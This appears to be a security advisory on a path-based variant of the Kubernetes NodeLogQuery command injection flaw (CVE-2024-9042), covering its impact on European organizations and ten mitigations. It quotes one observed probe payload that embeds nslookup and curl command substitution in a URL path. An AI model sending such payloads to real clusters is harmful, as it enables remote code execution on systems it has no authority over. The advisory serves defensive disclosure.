The threat concerns a possible new exploit variant related to CVE-2024-9042, an OS command injection vulnerability in Kubernetes' NodeLogQuery feature. Originally disclosed and patched in early 2025, the vulnerability allowed attackers to execute arbitrary OS commands on Windows nodes by sending specially crafted queries to the Kubernetes API proxy's logs endpoint. Exploitation required the node to be running Windows, the NodeLogQuery feature to be enabled (which was in beta and not enabled by default), and the attacker to have permissions to read logs. The original exploit passed OS commands as GET parameters in the query string. Recently, security researchers observed requests to honeypots that mimic the command injection pattern but embed the OS command within the URL path segment instead of the query parameters. This new pattern uses constructs like GET /$(nslookup -q=cname [domain]||curl [domain])/logs/, which could potentially bypass some input validation or filtering mechanisms. It is unclear if this represents a new vulnerability or a variant of CVE-2024-9042. The attack vector remains the Kubernetes API proxy server exposing the logs endpoint. The attacker leverages command substitution syntax to execute OS commands remotely, which could lead to remote code execution on the node. No confirmed exploitation in the wild has been reported, but the observed activity indicates active probing or early exploitation attempts. The threat highlights the risk of command injection vulnerabilities in Kubernetes features that expose node-level functionality, especially on Windows nodes. The NodeLogQuery feature's beta status and default disabled state reduce widespread exposure but do not eliminate risk for environments that enabled it. The exploit requires some level of authentication or permissions to access logs, limiting the attack surface to insiders or compromised credentials. However, once exploited, it could allow attackers to execute arbitrary commands on the node, potentially leading to full cluster compromise or lateral movement. The detection of this variant underscores the need for continuous monitoring of Kubernetes API traffic and rapid patching of known vulnerabilities.

For European organizations, the impact of this threat could be significant, especially for those running Kubernetes clusters with Windows nodes and the NodeLogQuery feature enabled. Successful exploitation could lead to remote code execution on cluster nodes, enabling attackers to execute arbitrary commands, potentially compromising the entire cluster. This could result in data breaches, service disruption, and lateral movement within enterprise networks. Organizations relying on Kubernetes for critical infrastructure or cloud-native applications may face operational downtime and reputational damage. The requirement for log read permissions and API access somewhat limits the threat to insiders or attackers who have already gained some foothold, but it still represents a serious escalation vector. Given the increasing adoption of Kubernetes in European enterprises and public sector organizations, especially in countries with advanced cloud infrastructure, the threat could affect sensitive government, financial, and industrial systems. The variant exploit technique using path-based command injection may bypass existing detection rules focused on query parameters, increasing the risk of undetected exploitation. Overall, the threat could undermine the confidentiality, integrity, and availability of Kubernetes-managed workloads and data.

1. Ensure all Kubernetes clusters are updated with the latest security patches, specifically those addressing CVE-2024-9042 and related vulnerabilities. 2. Disable the NodeLogQuery feature unless absolutely necessary, especially on Windows nodes, as it was in beta and not enabled by default. 3. Restrict access to the Kubernetes API proxy server to trusted users and networks, employing strong authentication and authorization controls. 4. Implement strict RBAC policies to limit log read permissions only to essential personnel and services. 5. Monitor Kubernetes API server logs and network traffic for unusual patterns, including command injection syntax in both query parameters and URL paths. 6. Deploy Web Application Firewalls (WAFs) or API gateways capable of detecting and blocking command injection attempts, including those using path-based payloads. 7. Conduct regular security audits and penetration testing focusing on Kubernetes API endpoints and node features. 8. Educate DevOps and security teams about this variant exploit technique to improve detection and response capabilities. 9. Use network segmentation to isolate Kubernetes nodes and limit lateral movement in case of compromise. 10. Employ runtime security tools that can detect anomalous command executions on nodes.